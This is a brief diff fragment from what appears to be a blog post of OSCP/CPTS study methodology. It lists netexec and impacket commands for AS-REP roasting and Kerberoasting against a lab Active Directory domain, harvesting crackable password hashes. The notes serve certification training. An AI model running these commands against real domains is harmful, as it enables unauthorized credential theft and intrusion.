ElmehdiLaassiri/ElmehdiLaassiri.github.io/_posts/2026-04-28-oscp-cpts-methodology.md

 this will check kerberoastable users using netexec .

 netexec ldap $target -u 'users_list.txt' -p '' -k --asreproast asrep.txt .

+# Kerberoasting using an ASREPROASTABLE user : Need a list of usernames , and the TGT for a user with no Pre_auth
+impacket-GetUserSPNs -no-preauth t.spivey tri.lab/ -dc-ip $DC_IP  -usersfile Valid_Users  -outputfile kerb_hash

 ```